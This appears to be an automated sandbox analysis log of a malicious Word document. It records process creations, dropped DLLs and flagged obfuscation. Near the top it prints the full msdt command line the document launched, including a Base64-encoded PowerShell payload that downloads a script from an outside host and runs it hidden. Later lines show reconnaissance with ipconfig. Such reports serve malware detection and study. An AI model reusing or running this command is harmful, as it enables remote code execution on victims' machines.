            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHMAdQBtAG0AaQB0AC4AZABpAGQAbgBzAC4AcgB1AC8AZgBvAHIAYgBlAHMAdAAuAHAAcwAxACcALAAgACcAQwA6AC8AdwBpAG4AZABvAHcAcwAvAHQAZQBtAHAALwA1AGQAYgA2ADUAYwA3AC4AcABzADEAJwApACAAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAFUAbgByAGUAcwB0AHIAaQBjAHQAZQBkACAALQBGAGkAbABlACAAQwA6AC8AVwBpAG4AZABvAHcAcwAvAFQAZQBtAHAALwA1AGQAYgA2ADUAYwA3AC4AcABzADEAJwA='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAD7B.tmp" "c:\Users\user\AppData\Local\Temp\qghxibcc\CSC6B59943BD49B40F0B0C17D73652F0B2.TMP"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC028.tmp" "c:\Users\user\AppData\Local\Temp\53i2jeo5\CSCF157ADCDF084F15A343B1EBC149E5EE.TMP"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /all
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES753.tmp" "c:\Users\user\AppData\Local\Temp\05d3mwhu\CSC34F94DCCCDC94BCAA3A860A33C1ABBE2.TMP"
            Source: C:\Windows\SysWOW64\msdt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InProcServer32
            Source: WF0SlQWKr1.docx.LNK.0.drLNK file: ..\..\..\..\..\Desktop\WF0SlQWKr1.docx
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_processor
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.WordJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{522C899F-291C-46FB-9B7D-26142961A6D7} - OProcSessId.datJump to behavior
            Source: classification engineClassification label: mal100.expl.evad.winDOCX@18/44@2/1
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1292:120:WilError_01
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile written: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.iniJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
            Source: C:\Windows\SysWOW64\msdt.exeFile opened: C:\Windows\SysWOW64\MSFTEDIT.DLL
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll

            Data Obfuscation

            barindex
            Suspicious powershell command line found
            Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Unrestricted -File C:/Windows/Temp/5db65c7.ps1
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qghxibcc\qghxibcc.cmdline
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\53i2jeo5\53i2jeo5.cmdline
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\05d3mwhu\05d3mwhu.cmdline

            Persistence and Installation Behavior

            barindex
            Uses ipconfig to lookup or modify the Windows network settings
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /all
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\qghxibcc\qghxibcc.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\53i2jeo5\53i2jeo5.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\05d3mwhu\05d3mwhu.dllJump to dropped file
            Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_5429739b-e3bc-4aa7-b049-21dfa05c9515\DiagPackage.dllJump to dropped file
            Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_5429739b-e3bc-4aa7-b049-21dfa05c9515\en-US\DiagPackage.dll.muiJump to dropped file
            Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_5429739b-e3bc-4aa7-b049-21dfa05c9515\DiagPackage.dllJump to dropped file
            Source: C:\Windows\SysWOW64\msdt.exeFile created: C:\Windows\Temp\SDIAG_5429739b-e3bc-4aa7-b049-21dfa05c9515\en-US\DiagPackage.dll.muiJump to dropped file
            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXERegistry key monitored for changes: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
